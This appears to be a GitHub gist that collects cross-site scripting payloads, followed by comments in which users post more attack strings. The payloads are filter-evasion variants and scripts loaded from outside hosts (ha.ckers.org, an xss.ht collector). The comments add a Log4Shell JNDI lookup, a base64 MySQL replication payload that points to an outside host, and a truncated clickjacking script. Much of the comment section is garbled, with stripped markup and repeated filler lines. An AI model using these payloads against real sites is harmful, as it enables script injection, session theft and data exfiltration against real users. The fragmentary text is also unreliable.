-
-
Save rvrsh3ll/09a8b933291f9f98e8ec to your computer and use it in GitHub Desktop.
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG SRC=javascript:alert("XSS")> | |
| <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
| <a onmouseover="alert(document.cookie)">xxs link</a> | |
| <a onmouseover=alert(document.cookie)>xxs link</a> | |
| <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
| <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
| <IMG SRC=# onmouseover="alert('xxs')"> | |
| <IMG SRC= onmouseover="alert('xxs')"> | |
| <IMG onmouseover="alert('xxs')"> | |
| <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> | |
| <IMG SRC=javascript:alert( | |
| 'XSS')> | |
| <IMG SRC=javascript:a& | |
| #0000108ert('XSS')> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC="jav ascript:alert('XSS');"> | |
| <IMG SRC="jav	ascript:alert('XSS');"> | |
| <IMG SRC="jav
ascript:alert('XSS');"> | |
| <IMG SRC="jav
ascript:alert('XSS');"> | |
| <IMG SRC="  javascript:alert('XSS');"> | |
| <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
| <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <<SCRIPT>alert("XSS");//<</SCRIPT> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
| <SCRIPT SRC=//ha.ckers.org/.j> | |
| <IMG SRC="javascript:alert('XSS')" | |
| <iframe src=http://ha.ckers.org/scriptlet.html < | |
| \";alert('XSS');// | |
| </script><script>alert('XSS');</script> | |
| </TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
| <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
| <BODY BACKGROUND="javascript:alert('XSS')"> | |
| <IMG DYNSRC="javascript:alert('XSS')"> | |
| <IMG LOWSRC="javascript:alert('XSS')"> | |
| <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
| <IMG SRC='vbscript:msgbox("XSS")'> | |
| <IMG SRC="livescript:[code]"> | |
| <BODY ONLOAD=alert('XSS')> | |
| <BGSOUND SRC="javascript:alert('XSS');"> | |
| <BR SIZE="&{alert('XSS')}"> | |
| <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
| <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
| <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
| <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
| <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
| <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
| <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
| exp/*<A STYLE='no\xss:noxss("*//*"); | |
| xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
| <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
| <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
| <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
| <XSS STYLE="xss:expression(alert('XSS'))"> | |
| <XSS STYLE="behavior: url(xss.htc);"> | |
| ¼script¾alert(¢XSS¢)¼/script¾ | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
| <IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
| <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
| <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
| <TABLE BACKGROUND="javascript:alert('XSS')"> | |
| <TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV STYLE="width: expression(alert('XSS'));"> | |
| <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> | |
| <BASE HREF="javascript:alert('XSS');//"> | |
| <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
| <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
| <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
| <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
| <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
| <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
| <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <A HREF="http://66.102.7.147/">XSS</A> | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" | |
| veris-->group<svg/onload=alert(/XSS/)// | |
| #"><img src=M onerror=alert('XSS');> | |
| element[attribute='<img src=x onerror=alert('XSS');> | |
| [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] | |
| %22;alert%28%27RVRSH3LL_XSS%29// | |
| javascript:alert%281%29; | |
| <w contenteditable id=x onfocus=alert()> | |
| alert;pg("XSS") | |
| <svg/onload=%26%23097lert%26lpar;1337)> | |
| <script>for((i)in(self))eval(i)(1)</script> | |
| <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> | |
| <sCR<script>iPt>alert(1)</SCr</script>IPt> | |
| <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> |
blackfly06
commented
May 18, 2021
onbounce
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
a
`````noobsheik````">
noobsheik
``````````````````````noobsheik```````````````````````'/><
click here to get the reward
``````````````````````noobsheik```````````````````````'/><
( <script> alert( 'PWND BY NOOBSHEIK' )%3B <%2Fscript> <%2Fbody> <%2Fhtml>)
">( <script> alert( 'PWND BY NOOBSHEIK' )%3B <%2Fscript> <%2Fbody> <%2Fhtml>)
```````````````````````````````````````````````noobsheik````````````````````````"><>//
<IMG SRC="mocha:[code]">
a="get";
```````````````````````````````````````````````noobsheik````````````````````````"><>//<svg/onerror=print(1)>
```````````````````````````````````````````````noobsheik````````````````````````"><></><svg/onerror=print(1)>
```````````````````````````````````````````````noobsheik````````````````````````"><>//"><svg/onerror=print(1)>
```````````````````````````````````````````````noobsheik````````````````````````"><>//<svg/onerror=print(1)>
`````````````````````````````````````````````noobsheik````````````````````````"><>//<svg/onerror=print(1)>````>click here <svg/onerror=print(1)>to get the reward
`><svg/onerror=print(1)>
click here to get the reward"/><svg/onerror=console.log(1)>
">
javascript:eval('var a=document.createElement('script');a.src='https://noobsec1.xss.ht\';document.body.appendChild(a)')
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://noobsec1.xss.ht";parent.document.body.appendChild(a);</script>">
"><img onload="https://c4h5izq72zn82rcibs3863m0yr4hs6.oastify.com"
/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. /
!function(){
var initialZoomFactor = '1.0', win, doc, width, height, clicks = [];
function addClickTrap(element, minusY) {
var clickTrap = doc.createElement('div'), cords = findPos(element);
clickTrap.style.backgroundColor = 'none';
clickTrap.style.border = 'none';
clickTrap.style.position = 'absolute';
clickTrap.style.left = cords[0] + 'px';
clickTrap.style.top = cords[1] + 'px';
clickTrap.style.width = element.offsetWidth + 'px';
clickTrap.style.height = element.offsetHeight + 'px';
if(element.zIndex || element.zIndex === '0') {
clickTrap.style.zIndex = +element.zIndex+1;
}
clickTrap.style.opacity = '0.5';
clickTrap.style.cursor = 'pointer';
clickTrap.clickTrap = 1;
clickTrap.addEventListener('click', function(e) {
generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page});
e.preventDefault();
e.stopPropagation();
return false;
}, true);
doc.body.appendChild(clickTrap);
}
function addMessage(msg) {
var message = document.createElement('div');
message.style.width = '100%';
message.style.height = '20px';
message.style.backgroundColor = '#fff5bf';
message.style.border = '1px solid #ff9900';
message.style.padding = '5px';
message.style.position = 'fixed';
message.style.bottom = '0';
message.style.left = '0';
message.style.zIndex = 100000;
message.style.textAlign = 'center';
message.style.fontFamily = 'Arial';
message.style.color = '#000';
message.appendChild(document.createTextNode(msg));
document.body.appendChild(message);
setTimeout(function() {
document.body.removeChild(message);
}, 4000);
}
function htmlEscape(str) {
str = str + '';
return str.replace(/[^\w :\-\/.?=]/gi, function(c){
return '&#' + (+c.charCodeAt(0))+';';
});
}
function getDocHeight(D) {
return Math.max(
D.body.scrollHeight, D.documentElement.scrollHeight,
D.body.offsetHeight, D.documentElement.offsetHeight,
D.body.clientHeight, D.documentElement.clientHeight
);
}
function getDocWidth(D) {
return Math.max(
D.body.scrollWidth, D.documentElement.scrollWidth,
D.body.offsetWidth, D.documentElement.offsetWidth,
D.body.clientWidth, D.documentElement.clientWidth
);
}
function findPos(obj) {
var left = 0, top = 0;
if(obj.offsetParent) {
while(1) {
left += obj.offsetLeft;
top += obj.offsetTop;
if(!obj.offsetParent) {
break;
}
obj = obj.offsetParent;
}
} else if(obj.x && obj.y) {
left += obj.x;
top += obj.y;
}
return [left,top];
}
function generatePoc(config) {
var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
element = config.element, x = config.x, y = config.y, pixelMode = false;
if(config.clickTracking) {
elementWidth = config.clickTracking[0].width;
elementHeight = config.clickTracking[0].height;
x = config.clickTracking[0].left;
y = config.clickTracking[0].top;
zoomIncrement = 1;
config.currentPosition = 0;
} else {
config.clickTracking = [];
if(element) {
elementWidth = element.offsetWidth;
elementHeight = element.offsetHeight;
cords = findPos(element);
x = cords[0];
y = cords[1];
zoomIncrement = 1;
} else {
zoomIncrement = 5;
pixelMode = true;
}
}
parentOffsetWidth = desiredX - x;
parentOffsetHeight = desiredY - y;
child = btoa('<script>window.addEventListener("message", function(e){ var data, childFrame = document.getElementById("childFrame"); try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit){ return false; } childFrame.style.width = data.docWidth+"px";childFrame.style.height = data.docHeight+"px";childFrame.style.left = data.left+"px";childFrame.style.top = data.top+"px";}, false);</script><iframe src="'+htmlEscape(self.location)+'" scrolling="no" style="width:'+(+maxWidth)+'px;height:'+(+maxHeight)+'px;position:absolute;left:'+parentOffsetWidth+'px;top:'+parentOffsetHeight+'px;border:0;" frameborder="0" '+(window.clickbandit.sandbox?'sandbox="allow-same-origin '+htmlEscape(document.getElementById('sandboxIframeInput').value)+'" ':'')+'id="childFrame" onload="parent.postMessage(JSON.stringify({clickbandit:1}),'')"></iframe>');
html += '\n';
html += '
html += '\n';
html += '\n';
html += '
">
javascript:eval('var a=document.createElement('script');a.src="https://noobsec1.xss.ht\';document.body.appendChild(a)")
${jndi:ldap://x${hostName}.L4J.zxc3uwa17ewa6nf6twybq6ioh.canarytokens.com/a}
">
">
SET @b = 'U0VUIEBiYiA9IENPTkNBVCgiQ0hBTkdFIE1BU1RFUiBUTyBNQVNURVJfUEFTU1dPUkQ9J215LXNlY3JldC1wdycsIE1BU1RFUl9SRVRSWV9DT1VOVD0xLCBNQVNURVJfUE9SVD0zMzA2LCBNQVNURVJfSE9TVD0nbGMzN3Nmem01ZmExZDJtbjRoN3Q3cTRwaC5jYW5hcnl0b2tlbnMuY29tJywgTUFTVEVSX1VTRVI9J2xjMzdzZnptNWZhMWQybW40aDd0N3E0cGgiLCBAQGxjX3RpbWVfbmFtZXMsIEBAaG9zdG5hbWUsICInOyIpOw==';
SET @S2 = FROM_BASE64(@b);
PREPARE stmt1 FROM @S2;
EXECUTE stmt1;
PREPARE stmt2 FROM @bb;
EXECUTE stmt2;
START REPLICA;
"/>
SET @b = 'U0VUIEBiYiA9IENPTkNBVCgiQ0hBTkdFIE1BU1RFUiBUTyBNQVNURVJfUEFTU1dPUkQ9J215LXNlY3JldC1wdycsIE1BU1RFUl9SRVRSWV9DT1VOVD0xLCBNQVNURVJfUE9SVD0zMzA2LCBNQVNURVJfSE9TVD0nbGMzN3Nmem01ZmExZDJtbjRoN3Q3cTRwaC5jYW5hcnl0b2tlbnMuY29tJywgTUFTVEVSX1VTRVI9J2xjMzdzZnptNWZhMWQybW40aDd0N3E0cGgiLCBAQGxjX3RpbWVfbmFtZXMsIEBAaG9zdG5hbWUsICInOyIpOw==';
SET @S2 = FROM_BASE64(@b);
PREPARE stmt1 FROM @S2;
EXECUTE stmt1;
PREPARE stmt2 FROM @bb;
EXECUTE stmt2;
START REPLICA;
SET @b = 'U0VUIEBiYiA9IENPTkNBVCgiQ0hBTkdFIE1BU1RFUiBUTyBNQVNURVJfUEFTU1dPUkQ9J215LXNlY3JldC1wdycsIE1BU1RFUl9SRVRSWV9DT1VOVD0xLCBNQVNURVJfUE9SVD0zMzA2LCBNQVNURVJfSE9TVD0nbGMzN3Nmem01ZmExZDJtbjRoN3Q3cTRwaC5jYW5hcnl0b2tlbnMuY29tJywgTUFTVEVSX1VTRVI9J2xjMzdzZnptNWZhMWQybW40aDd0N3E0cGgiLCBAQGxjX3RpbWVfbmFtZXMsIEBAaG9zdG5hbWUsICInOyIpOw==';
SET @S2 = FROM_BASE64(@b);
PREPARE stmt1 FROM @S2;
EXECUTE stmt1;
PREPARE stmt2 FROM @bb;
EXECUTE stmt2;
START REPLICA;
"><img src=y
">svg>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//noobsec1.xss.ht");a.send();
">
Noobsheik
">
PWND BY NOOBSHEIK
Noobsheik
">
HTML INJECTION POSSIBLE
">
qwqwq%3C%20SRC=%22jav
ascript:alert(0);">
<img alt="<img onerror=alert(1)//"<">
">
<img alt="<img onerror=alert(1)//"<">
qwqwq%3C%20SRC=%22jav
ascript:alert(0);">
<img alt="<img onerror=alert(1)//"<">
">
PWND BY AYMEN
xssbys3c\
xssbys3c'
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xss
xssbys3c</>
xssbys3c"
xss
xss
xss
xss
test
test
/>
<--
<--test--!>
<scrip
<scr
<s
<
test
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
Password
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
click me
hekk
[Lll](https://"><img src=x oneror=prompt()/{{}})
Lllll
xxs link
<a href=>f
<a href=>f
click
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
"
alert()
alert(1)
javascript:alert(25)
test
"<img src=
</p> </code>"</div ></task ></div><script alert(11); </script><br /> <code class="notranslate"> p
<img src=x onerror=alert('XSS');>
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window'pro'%2B'mpt'")-'
"-eval("window'pro'%2B'mpt'")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
</scrip</script>t>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1)</script>
123
456
X
xss
